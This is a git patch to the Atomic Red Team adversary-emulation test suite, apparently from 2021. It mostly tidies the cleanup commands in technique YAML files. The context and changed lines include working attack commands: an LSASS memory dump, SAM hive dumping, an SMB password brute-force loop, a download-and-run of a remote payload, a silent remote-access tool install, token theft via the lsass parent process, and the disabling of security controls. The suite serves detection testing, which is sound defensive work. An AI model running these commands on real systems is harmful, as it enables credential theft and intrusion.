From 5bb5878e623f90366fb1726ea763952856ac76b9 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 9 Dec 2021 11:42:14 -0700 Subject: [PATCH] Cleaning up the Cleanup commands (#1685) * cleanup fixes * cleanup fixes * cleanup fixes --- atomics/T1003.001/T1003.001.yaml | 4 ++-- atomics/T1003.002/T1003.002.yaml | 6 ++---- atomics/T1040/T1040.yaml | 8 ++++---- atomics/T1047/T1047.yaml | 2 +- atomics/T1059.003/T1059.003.yaml | 2 +- atomics/T1069.001/T1069.001.yaml | 2 +- atomics/T1098.001/T1098.001.yaml | 12 ++++++++---- atomics/T1105/T1105.yaml | 2 +- atomics/T1110.001/T1110.001.yaml | 4 ++-- atomics/T1112/T1112.yaml | 2 +- atomics/T1119/T1119.yaml | 2 +- atomics/T1134.002/T1134.002.yaml | 7 ++----- atomics/T1137.002/T1137.002.yaml | 2 +- atomics/T1137.004/T1137.004.yaml | 2 +- atomics/T1137/T1137.yaml | 4 ++-- atomics/T1197/T1197.yaml | 2 +- atomics/T1204.002/T1204.002.yaml | 2 +- atomics/T1219/T1219.yaml | 2 +- atomics/T1220/T1220.yaml | 4 ++-- atomics/T1222.001/T1222.001.yaml | 20 +++++--------------- atomics/T1484.002/T1484.002.yaml | 6 ++++-- atomics/T1490/T1490.yaml | 4 ++-- atomics/T1547.010/T1547.010.yaml | 2 +- atomics/T1552.004/T1552.004.yaml | 8 ++++---- atomics/T1553.004/T1553.004.yaml | 6 +++--- atomics/T1562.001/T1562.001.yaml | 4 +++- 26 files changed, 57 insertions(+), 64 deletions(-) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index d29dd83d..8f5c91e8 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -369,7 +369,7 @@ atomic_tests: $ID = $FIELDS[1] & "#{createdump_exe}" -u -f #{output_file} $ID cleanup_command: | - del #{output_file} + Remove-Item #{output_file} -ErrorAction Ignore name: powershell elevation_required: true - name: Dump LSASS.exe using imported Microsoft DLLs @@ -403,6 +403,6 @@ atomic_tests: command: | #{xordump_exe} -out #{output_file} -x 0x41 cleanup_command: | - Remove-Item ${output_file} -ErrorAction Ignore + Remove-Item #{output_file} -ErrorAction Ignore name: powershell elevation_required: true diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index 27c10567..d5325e0b 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -130,9 +130,8 @@ atomic_tests: name: powershell elevation_required: false cleanup_command: | - write-host "" $toremove = #{dump_path} + "\" + '#{dumped_hive}' - rm $toremove + rm $toremove -ErrorAction Ignore - name: dump volume shadow copy hives with System.IO.File auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0 @@ -165,6 +164,5 @@ atomic_tests: name: powershell elevation_required: false cleanup_command: | - write-host "" $toremove = #{dump_path} + "\" + '#{dumped_hive}' - rm $toremove \ No newline at end of file + rm $toremove -ErrorAction Ignore \ No newline at end of file diff --git a/atomics/T1040/T1040.yaml b/atomics/T1040/T1040.yaml index e965dde8..aca5394a 100644 --- a/atomics/T1040/T1040.yaml +++ b/atomics/T1040/T1040.yaml @@ -116,10 +116,10 @@ atomic_tests: executor: command: netsh trace start capture=yes tracefile=%temp%\trace.etl maxsize=10 cleanup_command: |- - netsh trace stop - TIMEOUT /T 50 - del %temp%\trace.etl - del %temp%\trace.cab + netsh trace stop >nul 2>&1 + TIMEOUT /T 5 >nul 2>&1 + del %temp%\trace.etl >nul 2>&1 + del %temp%\trace.cab >nul 2>&1 name: command_prompt elevation_required: true diff --git a/atomics/T1047/T1047.yaml b/atomics/T1047/T1047.yaml index 127ff171..f8455405 100644 --- a/atomics/T1047/T1047.yaml +++ b/atomics/T1047/T1047.yaml @@ -148,7 +148,7 @@ atomic_tests: Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute} cleanup_command: | $CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}")) - $CleanupClass.Delete() + try { $CleanupClass.Delete() } catch {} - name: WMI Execute rundll32 auto_generated_guid: 00738d2a-4651-4d76-adf2-c43a41dfb243 description: | diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml index 1ab5f5a6..db254e43 100644 --- a/atomics/T1059.003/T1059.003.yaml +++ b/atomics/T1059.003/T1059.003.yaml @@ -50,7 +50,7 @@ atomic_tests: command: | echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}" cleanup_command: | - del "#{file_contents_path}" + del "#{file_contents_path}" >nul 2>&1 name: command_prompt - name: Suspicious Execution via Windows Command Shell auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 diff --git a/atomics/T1069.001/T1069.001.yaml b/atomics/T1069.001/T1069.001.yaml index d259deeb..03b0ac3e 100644 --- a/atomics/T1069.001/T1069.001.yaml +++ b/atomics/T1069.001/T1069.001.yaml @@ -76,7 +76,7 @@ atomic_tests: New-Item -Path "#{output_path}" -ItemType Directory > $null & "#{sharphound_path}" -d "#{domain}" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory "#{output_path}" cleanup_command: | - Remove-Item -Recurse #{output_path} + Remove-Item -Recurse #{output_path} -ErrorAction Ignore - name: Wmic Group Discovery auto_generated_guid: 7413be50-be8e-430f-ad4d-07bf197884b2 diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml index 1bff621e..1dc75641 100644 --- a/atomics/T1098.001/T1098.001.yaml +++ b/atomics/T1098.001/T1098.001.yaml @@ -66,10 +66,11 @@ atomic_tests: Write-Host "End of Hijacking" cleanup_command: | - Import-Module -Name AzureAD + try { + Import-Module -Name AzureAD -ErrorAction Ignore $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword - Connect-AzureAD -Credential $Credential + Connect-AzureAD -Credential $Credential -ErrorAction Ignore $sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}" $credz = Get-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId @@ -80,6 +81,7 @@ atomic_tests: } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item rm "#{path_to_cert}\#{service_principal_name}.pfx" + } catch {} name: powershell elevation_required: false @@ -146,10 +148,11 @@ atomic_tests: Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: | - Import-Module -Name AzureAD + try { + Import-Module -Name AzureAD -ErrorAction Ignore $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword - Connect-AzureAD -Credential $Credential + Connect-AzureAD -Credential $Credential -ErrorAction Ignore $app = Get-AzureADApplication -Searchstring "#{application_name}" $credz = Get-AzureADApplicationKeyCredential -ObjectId $app.ObjectId @@ -160,6 +163,7 @@ atomic_tests: } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item rm "#{path_to_cert}\#{application_name}.pfx" + } catch {} name: powershell elevation_required: false - name: AWS - Create Access Key and Secret Key diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 6d55d124..f04c2554 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -438,7 +438,7 @@ atomic_tests: cleanup_command: | $inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\" $file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue) - cmd.exe /c "del $file_to_be_removed" + if("" -ne "$file_to_be_removed") { Remove-Item "$file_to_be_removed" -ErrorAction Ignore } name: powershell - name: Curl Download File diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml index 932218dc..f86f8a09 100644 --- a/atomics/T1110.001/T1110.001.yaml +++ b/atomics/T1110.001/T1110.001.yaml @@ -33,8 +33,8 @@ atomic_tests: echo "Password!" >> #{input_file_passwords} @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL cleanup_command: |- - del #{input_file_users} - del #{input_file_passwords} + del #{input_file_users} >nul 2>&1 + del #{input_file_passwords} >nul 2>&1 - name: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250 description: | diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index 3e50709c..beba1b86 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml @@ -106,5 +106,5 @@ atomic_tests: command: | Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope LocalMachine cleanup_command: | - Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy} -Scope LocalMachine + try { Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy} -Scope LocalMachine -Force } catch {} name: powershell diff --git a/atomics/T1119/T1119.yaml b/atomics/T1119/T1119.yaml index a2d74e8c..82c9b8e7 100644 --- a/atomics/T1119/T1119.yaml +++ b/atomics/T1119/T1119.yaml @@ -14,7 +14,7 @@ atomic_tests: dir c: /b /s .docx | findstr /e .docx for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection cleanup_command: | - del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1 + del %temp%\T1119_command_prompt_collection /F /Q >nul 2>&1 name: command_prompt - name: Automated Collection PowerShell auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 diff --git a/atomics/T1134.002/T1134.002.yaml b/atomics/T1134.002/T1134.002.yaml index f917b80b..fe791031 100644 --- a/atomics/T1134.002/T1134.002.yaml +++ b/atomics/T1134.002/T1134.002.yaml @@ -2,7 +2,7 @@ attack_technique: T1134.002 display_name: "Create Process with Token" atomic_tests: - name: Access Token Manipulation - auto_generated_guid: dbf4f5a9-b8e0-46a3-9841-9ad71247239e + auto_generated_guid: dbf4f5a9-b8e0-46a3-9841-9ad71247239e description: | This Action demonstrates how an access token for a specific program can spawn another program under a different owner. Adversaries can leverage access tokens to run programs under a different user not only to achieve privilege escalation but also to evade detection by blending in with normal user activity. @@ -15,9 +15,6 @@ atomic_tests: $owners = @{} gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user} Get-Process | Select ProcessName,Id,@{l="Owner";e={$owners[$_.id.tostring()]}} - Set-Location $PathToAtomicsFolder - .\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe") - cleanup_command: | - taskkill /im cmd.exe /f + $PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe") name: powershell elevation_required: true \ No newline at end of file diff --git a/atomics/T1137.002/T1137.002.yaml b/atomics/T1137.002/T1137.002.yaml index 3996acbe..b6f1f5d6 100644 --- a/atomics/T1137.002/T1137.002.yaml +++ b/atomics/T1137.002/T1137.002.yaml @@ -17,5 +17,5 @@ atomic_tests: command: | reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}" cleanup_command: | - reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /f >nul 2>&1 name: command_prompt diff --git a/atomics/T1137.004/T1137.004.yaml b/atomics/T1137.004/T1137.004.yaml index cb47f610..1fa82435 100644 --- a/atomics/T1137.004/T1137.004.yaml +++ b/atomics/T1137.004/T1137.004.yaml @@ -36,4 +36,4 @@ atomic_tests: command: | reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f cleanup_command: | - reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f + reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f >nul 2>&1 diff --git a/atomics/T1137/T1137.yaml b/atomics/T1137/T1137.yaml index 238f7a5b..0ba21f5a 100644 --- a/atomics/T1137/T1137.yaml +++ b/atomics/T1137/T1137.yaml @@ -17,6 +17,6 @@ atomic_tests: mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM cleanup_command: | - reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f - del %APPDATA%\Microsoft\Outlook\VbaProject.OTM + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f >nul 2>&1 + del %APPDATA%\Microsoft\Outlook\VbaProject.OTM >nul 2>&1 name: command_prompt diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml index a8011911..2324e24f 100644 --- a/atomics/T1197/T1197.yaml +++ b/atomics/T1197/T1197.yaml @@ -114,5 +114,5 @@ atomic_tests: command: | set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr cleanup_command: | - del #{cleanup_path}\#{cleanup_file} >null 2>&1 + del #{cleanup_path}\#{cleanup_file} >nul 2>&1 name: command_prompt diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index e111be09..934d8f7e 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml @@ -315,7 +315,7 @@ atomic_tests: Invoke-WebRequest #{pua_url} -OutFile #{pua_file} & "#{pua_file}" cleanup_command: | - Remove-Item #{pua_file} + Remove-Item #{pua_file} -ErrorAction Ignore - name: Office Generic Payload Download auto_generated_guid: 5202ee05-c420-4148-bf5e-fd7f7d24850c description: | diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml index d6ae2733..fdffafb2 100644 --- a/atomics/T1219/T1219.yaml +++ b/atomics/T1219/T1219.yaml @@ -82,7 +82,7 @@ atomic_tests: $installer = "C:\Users\$env:username\Downloads\ScreenConnect.msi" Invoke-WebRequest -OutFile $installer "https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi" msiexec /i $installer /qn - cleanup_command: + cleanup_command: | $installer = "C:\Users\$env:username\Downloads\ScreenConnect.msi" msiexec /x $installer /qn name: powershell diff --git a/atomics/T1220/T1220.yaml b/atomics/T1220/T1220.yaml index 1656a3a4..4bfa6f90 100644 --- a/atomics/T1220/T1220.yaml +++ b/atomics/T1220/T1220.yaml @@ -49,7 +49,7 @@ atomic_tests: command: | #{msxsl_exe} #{xmlfile} #{xslfile} cleanup_command: | - Remove-Item -Path #{msxsl_exe} -Force -ErrorAction Ignore + del #{msxsl_exe} >nul 2>&1 name: command_prompt - name: MSXSL Bypass using remote files auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 @@ -85,7 +85,7 @@ atomic_tests: command: | #{msxsl_exe} #{xmlfile} #{xslfile} cleanup_command: | - Remove-Item -Path #{msxsl_exe} -Force -ErrorAction Ignore + del -Path #{msxsl_exe} >nul 2>&1 name: command_prompt - name: WMIC bypass using local XSL file auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 diff --git a/atomics/T1222.001/T1222.001.yaml b/atomics/T1222.001/T1222.001.yaml index 23ab22af..d8dfe3d5 100644 --- a/atomics/T1222.001/T1222.001.yaml +++ b/atomics/T1222.001/T1222.001.yaml @@ -95,28 +95,18 @@ atomic_tests: - windows input_arguments: file_or_folder: - description: Path of the file or folder remove attribute. + description: Path of the files to hide. type: Path default: '%temp%\T1222.001_attrib_2' - dependency_executor_name: command_prompt - dependencies: - - description: | - Test requires a file to modify to be located at (#{file_or_folder}) - prereq_command: | - IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) - get_prereq_command: | - mkdir #{file_or_folder} - echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt - echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt executor: command: | + mkdir #{file_or_folder} >nul 2>&1 + echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt + echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt attrib.exe +h #{file_or_folder}\T1222.001_attrib1.txt attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt cleanup_command: | - attrib.exe -h #{file_or_folder}\T1222.001_attrib1.txt - attrib.exe -h #{file_or_folder}\T1222.001_attrib2.txt - del #{file_or_folder}\T1222.001_attrib*.txt - rmdir #{file_or_folder} + del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1 name: command_prompt - name: 'Grant Full Access to folder for Everyone - Ryuk Ransomware Style' auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 diff --git a/atomics/T1484.002/T1484.002.yaml b/atomics/T1484.002/T1484.002.yaml index 7c1aeddf..11544e7f 100644 --- a/atomics/T1484.002/T1484.002.yaml +++ b/atomics/T1484.002/T1484.002.yaml @@ -64,11 +64,13 @@ atomic_tests: Get-AzureADExternalDomainFederation -ExternalDomainName "#{domain_name}" Write-Host "End of federation configuration." cleanup_command: | - Import-Module AzureADPreview + try { + Import-Module AzureADPreview -ErrorAction Ignore $PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword - Connect-AzureAD -Credential $Credential > $null + Connect-AzureAD -Credential $Credential -ErrorAction Ignore Remove-AzureADExternalFederationDomain -ExternalDomainName "#{domain_name}" + } catch {} name: powershell diff --git a/atomics/T1490/T1490.yaml b/atomics/T1490/T1490.yaml index 61510ea3..f117a4da 100644 --- a/atomics/T1490/T1490.yaml +++ b/atomics/T1490/T1490.yaml @@ -112,6 +112,6 @@ atomic_tests: command: | schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable cleanup_command: | - schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable - name: powershell + schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1 + name: command_prompt elevation_required: true diff --git a/atomics/T1547.010/T1547.010.yaml b/atomics/T1547.010/T1547.010.yaml index 07f5068d..5de6919d 100644 --- a/atomics/T1547.010/T1547.010.yaml +++ b/atomics/T1547.010/T1547.010.yaml @@ -15,6 +15,6 @@ atomic_tests: command: | reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ cleanup_command: | - reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" + reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 name: command_prompt elevation_required: true diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml index aadbebc1..f6bac6d6 100644 --- a/atomics/T1552.004/T1552.004.yaml +++ b/atomics/T1552.004/T1552.004.yaml @@ -125,8 +125,8 @@ atomic_tests: Get-ChildItem | Where-Object {$_ -like "ADFS*"} Write-Host "`nCertificates retrieved successfully" cleanup_command: | - Remove-Item -Path ".\ADFS_encryption.pfx" - Remove-Item -Path ".\ADFS_signing.pfx" + Remove-Item -Path ".\ADFS_encryption.pfx" -ErrorAction Ignore + Remove-Item -Path ".\ADFS_signing.pfx" -ErrorAction Ignore name: powershell - name: ADFS token signing and encryption certificates theft - Remote auto_generated_guid: cab413d8-9e4a-4b8d-9b84-c985bd73a442 @@ -194,6 +194,6 @@ atomic_tests: Get-ChildItem | Where-Object {$_ -like "ADFS*"} Write-Host "`nCertificates retrieved successfully" cleanup_command: | - Remove-Item -Path ".\ADFS_encryption.pfx" - Remove-Item -Path ".\ADFS_signing.pfx" + Remove-Item -Path ".\ADFS_encryption.pfx" -ErrorAction Ignore + Remove-Item -Path ".\ADFS_signing.pfx" -ErrorAction Ignore name: powershell diff --git a/atomics/T1553.004/T1553.004.yaml b/atomics/T1553.004/T1553.004.yaml index 48a5984e..115b13a0 100644 --- a/atomics/T1553.004/T1553.004.yaml +++ b/atomics/T1553.004/T1553.004.yaml @@ -117,9 +117,7 @@ atomic_tests: Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore } - catch { - Write-Host "Elevation required but not provided" -ForegroundColor Red - } + catch { } name: powershell elevation_required: true - name: Install root CA on Windows with certutil @@ -147,8 +145,10 @@ atomic_tests: command: | certutil -addstore my #{pfx_path} cleanup_command: | + try { $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore + } catch { } name: powershell elevation_required: true diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml index 93e41207..bb4bd54d 100644 --- a/atomics/T1562.001/T1562.001.yaml +++ b/atomics/T1562.001/T1562.001.yaml @@ -519,12 +519,14 @@ atomic_tests: Disable-AntiPhishRule -Identity $test.Name -Confirm:$false Get-AntiPhishRule cleanup_command: | - $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force + if("#{password}" -ne "") { + $secure_pwd = ("#{password}" + "") | ConvertTo-SecureString -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd Connect-ExchangeOnline -Credential $creds $test = Get-AntiPhishRule Enable-AntiPhishRule -Identity $test.Name -Confirm:$false Get-AntiPhishRule + } name: powershell elevation_required: false - name: Disable Windows Defender with DISM